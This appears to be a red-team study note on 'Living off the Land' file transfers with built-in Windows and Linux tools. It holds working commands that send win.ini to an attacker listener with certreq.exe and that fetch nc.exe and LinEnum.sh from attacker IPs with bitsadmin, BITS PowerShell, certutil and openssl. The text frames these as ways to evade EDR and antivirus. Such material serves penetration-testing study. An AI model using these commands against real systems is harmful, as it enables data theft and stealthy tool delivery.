# Upload and Download with Built in OS Tools *** ### πŸ₯Ύ **Living off the Land (LOTL)** – File Transfers without Dropping Tools 🧠 The term **"Living off the Land"** was coined by @obscuresec & @mattifestation and refers to **leveraging built-in binaries** on Windows and Linux to perform tasks like: * πŸ“€ Uploads * πŸ“₯ Downloads * βš™οΈ Execution * πŸ“– File access * πŸ” Bypasses πŸ’‘ This stealthy technique reduces the need for external tools β€” which helps **evade EDRs, AVs, and logging** solutions. *** ### 🧰 Toolkits to Know #### πŸͺŸ Windows – [**LOLBAS**](https://lolbas-project.github.io/) > A catalog of **Living off the Land Binaries And Scripts** for Windows. #### 🐧 Linux – [**GTFOBins**](https://gtfobins.github.io/) > A curated list of Unix binaries that can be abused by attackers or red teamers. Use filters like: * `/download` * `/upload` * `+file read` * `+file write` *** ### πŸ”Windows: Upload Using `certreq.exe` (LOLBAS) From the **target system**: ```cmd certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini ``` This sends `win.ini` to our attack server. We catch it with: ```bash sudo nc -lvnp 8000 ``` πŸ“ Copy-paste the contents from the netcat listener! ⚠️ **Heads-up**: Some versions of `certreq.exe` do **not** support the `-Post` parameter. Use an updated version if needed. *** ### πŸ“₯ Linux: Download Using OpenSSL (GTFOBins) #### πŸ› οΈ Step 1: On Attacker (Start SSL Server) ```bash openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh ``` #### πŸ“₯ Step 2: On Target (Download File) ```bash openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh ``` βœ… File received securely over SSL without any need for web servers or wget/curl. *** ### 🧱 Other Powerful LOTL Tools #### πŸ›°οΈ **Bitsadmin** (Windows) {% code overflow="wrap" %} ```powershell bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\Public\nc.exe ``` {% endcode %} > Transfers files silently using **BITS**, which mimics legit system update behavior. *** #### πŸŒ€ **PowerShell BITS Transfer** {% code overflow="wrap" %} ```powershell Import-Module bitstransfer Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" ``` {% endcode %} > More advanced, supports proxies and credentials πŸ•΅οΈβ€β™‚οΈ *** #### πŸ” **Certutil.exe** ```cmd certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe ``` > Originally used for certs… now a defacto `wget` for red teamers. ⚠️ **AMSI may flag this!** Useful in **lab environments or bypass testing.** ***